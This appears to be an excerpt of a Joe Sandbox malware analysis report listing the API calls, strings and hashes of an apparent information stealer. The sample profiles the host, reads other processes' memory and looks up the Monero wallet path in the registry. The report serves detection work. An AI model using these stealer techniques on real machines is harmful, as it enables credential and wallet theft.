                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                                                                                                                                                                    • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                                                                    • API String ID: 834187326-2211150622
                                                                                                                                                                                                                                                    • Opcode ID: 3ae0587f9760104ceffed54faf6f93c109bfca98553ce9b08bb3cb482f0288de
                                                                                                                                                                                                                                                    • Instruction ID: d4d7f60e1bba30e13d91510ba9933e91346612d131abedd106c6f596819fd7c2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ae0587f9760104ceffed54faf6f93c109bfca98553ce9b08bb3cb482f0288de
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E21B030201606AFDF15DF1CE840AB97BF0EB05348B18826BE849CB36ADB34ED02DB50
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • UnDecorator::UScore.LIBCMT ref: 000A12E7
                                                                                                                                                                                                                                                    • DName::DName.LIBCMT ref: 000A12F3
                                                                                                                                                                                                                                                      • Part of subcall function 0009EFBE: DName::doPchar.LIBCMT ref: 0009EFEF
                                                                                                                                                                                                                                                    • UnDecorator::getScopedName.LIBCMT ref: 000A1332
                                                                                                                                                                                                                                                    • DName::operator+=.LIBCMT ref: 000A133C
                                                                                                                                                                                                                                                    • DName::operator+=.LIBCMT ref: 000A134B
                                                                                                                                                                                                                                                    • DName::operator+=.LIBCMT ref: 000A1357
                                                                                                                                                                                                                                                    • DName::operator+=.LIBCMT ref: 000A1364
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                                                                                                                                                                    • String ID: void
                                                                                                                                                                                                                                                    • API String ID: 1480779885-3531332078
                                                                                                                                                                                                                                                    • Opcode ID: a38e1422f466bed39a087660c02447f37050bb8c353e6e6b5283f8b3c7256793
                                                                                                                                                                                                                                                    • Instruction ID: 2e6e0a380de2b27a5da5297f46f9fb1eb22301ada0fa78a46b2a6bff5849e68d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a38e1422f466bed39a087660c02447f37050bb8c353e6e6b5283f8b3c7256793
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D118272500144AFDF05EFA8C856AFE7FA4AF11714F4441A9E4169B2E7DB70AB44C750
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00091575
                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00091580
                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0009158B
                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00091596
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00094098,?,Display Resolution: ,000B68F4,00000000,User Name: ,000B68E4,00000000,Computer Name: ,000B68D0,AV: ,000B68C4), ref: 000915A2
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00094098,?,Display Resolution: ,000B68F4,00000000,User Name: ,000B68E4,00000000,Computer Name: ,000B68D0,AV: ,000B68C4,Install Date: ), ref: 000915A9
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 000915BB
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                                                                                                    • String ID: %dx%d
                                                                                                                                                                                                                                                    • API String ID: 3940144428-2206825331
                                                                                                                                                                                                                                                    • Opcode ID: 9a4ff0430a5e43e6642005f397eea05d819af2e6b108d28053b44e1f7696fef8
                                                                                                                                                                                                                                                    • Instruction ID: 826c1d3f1d85035e3b2ebea3863e3ec2417e352860ff9fb73148bca9ad663591
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a4ff0430a5e43e6642005f397eea05d819af2e6b108d28053b44e1f7696fef8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72F06872D42220BBEB203BA5FC4DDDB7F6CEF46BE5B014452F605DA161D6B15D1087A0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 000A6634
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 000A6642
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 000A664D
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 000A6621
                                                                                                                                                                                                                                                      • Part of subcall function 0009D93B: HeapFree.KERNEL32(00000000,00000000,?,0009D18F,00000000,000BB6F4,0009D1D6,0008EEBE,?,?,0009D2C0,000BB6F4,?,?,000AEC38,000BB6F4), ref: 0009D951
                                                                                                                                                                                                                                                      • Part of subcall function 0009D93B: GetLastError.KERNEL32(?,?,?,0009D2C0,000BB6F4,?,?,000AEC38,000BB6F4,?,?,?), ref: 0009D963
                                                                                                                                                                                                                                                    • ___free_lc_time.LIBCMT ref: 000A666B
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 000A6676
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 000A669B
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 000A66B2
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 000A66C1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lc_time
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3704779436-0
                                                                                                                                                                                                                                                    • Opcode ID: c211b1c8926220c1336b28ddbbeb6d787029ebf7d4ec53d91b14a700d3a0e58c
                                                                                                                                                                                                                                                    • Instruction ID: 15fe73f144f8aea1baed0bbe7e2df1523f9e79d730e022212c73ddc428772c08
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c211b1c8926220c1336b28ddbbeb6d787029ebf7d4ec53d91b14a700d3a0e58c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C01191B2140301ABDF207FF5C885A9AF3F5AB02708F18093FF14A97102CA369941CB10
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0008FB52
                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0008FB7E
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 0008FBC1
                                                                                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0008FD17
                                                                                                                                                                                                                                                      • Part of subcall function 0008F030: _memmove.LIBCMT ref: 0008F04A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: OpenProcess_memmove_memset
                                                                                                                                                                                                                                                    • String ID: N0ZWFt
                                                                                                                                                                                                                                                    • API String ID: 2647191932-431618156
                                                                                                                                                                                                                                                    • Opcode ID: 41af2b86e4f5207a3b0b4b4cb13b6a52e0765865f03f809031358b0856c1ba06
                                                                                                                                                                                                                                                    • Instruction ID: e34e71efe39f901cf3d7e1adaa97613a8e1503da63d0227493fa8cd76df77372
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41af2b86e4f5207a3b0b4b4cb13b6a52e0765865f03f809031358b0856c1ba06
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0451ADB1D002299FDB20AB60CD85BEDB7B9BB44304F0001F9A249A7253EA756FC8CF55
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,0008FBE3,?,00000000,00000000,?,?), ref: 0008F934
                                                                                                                                                                                                                                                    • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,0008FBE3,?,00000000,00000000), ref: 0008F95E
                                                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 0008F9AB
                                                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0008FA04
                                                                                                                                                                                                                                                    • VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 0008FA5C
                                                                                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0008FBE3,?,00000000,00000000,?,?), ref: 0008FA6D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MemoryProcessQueryReadVirtual
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 3835927879-2766056989
                                                                                                                                                                                                                                                    • Opcode ID: 58a5e4862f0da5971e7c4e0059d277af537eee2873a15bfd1efd10ab1d2d1062
                                                                                                                                                                                                                                                    • Instruction ID: 22c6bc068c63a3e083e5b2a6beda50e774aed998fbc85cb7dc62c1315e028902
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58a5e4862f0da5971e7c4e0059d277af537eee2873a15bfd1efd10ab1d2d1062
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA418E72A0020ABBEF14AFB4CC49BEF7BB6FB44760F148035FA44A6190D7758951DB91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00081A65
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00081A6C
                                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00081AE9), ref: 00081A89
                                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(00081AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00081AA4
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00081AE9), ref: 00081AAD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • SOFTWARE\monero-project\monero-core, xrefs: 00081A7F
                                                                                                                                                                                                                                                    • wallet_path, xrefs: 00081A9C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                    • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                                                                                                                                                    • API String ID: 3466090806-4244082812
                                                                                                                                                                                                                                                    • Opcode ID: 8a38e99a1c91602e99152ae0c55544bbf28e9d29fc696bda232c8a71813086a8
                                                                                                                                                                                                                                                    • Instruction ID: 2f291944c660d135648e1755d7f34c44735bcfde6e258b334a5d2f85fcbc282c
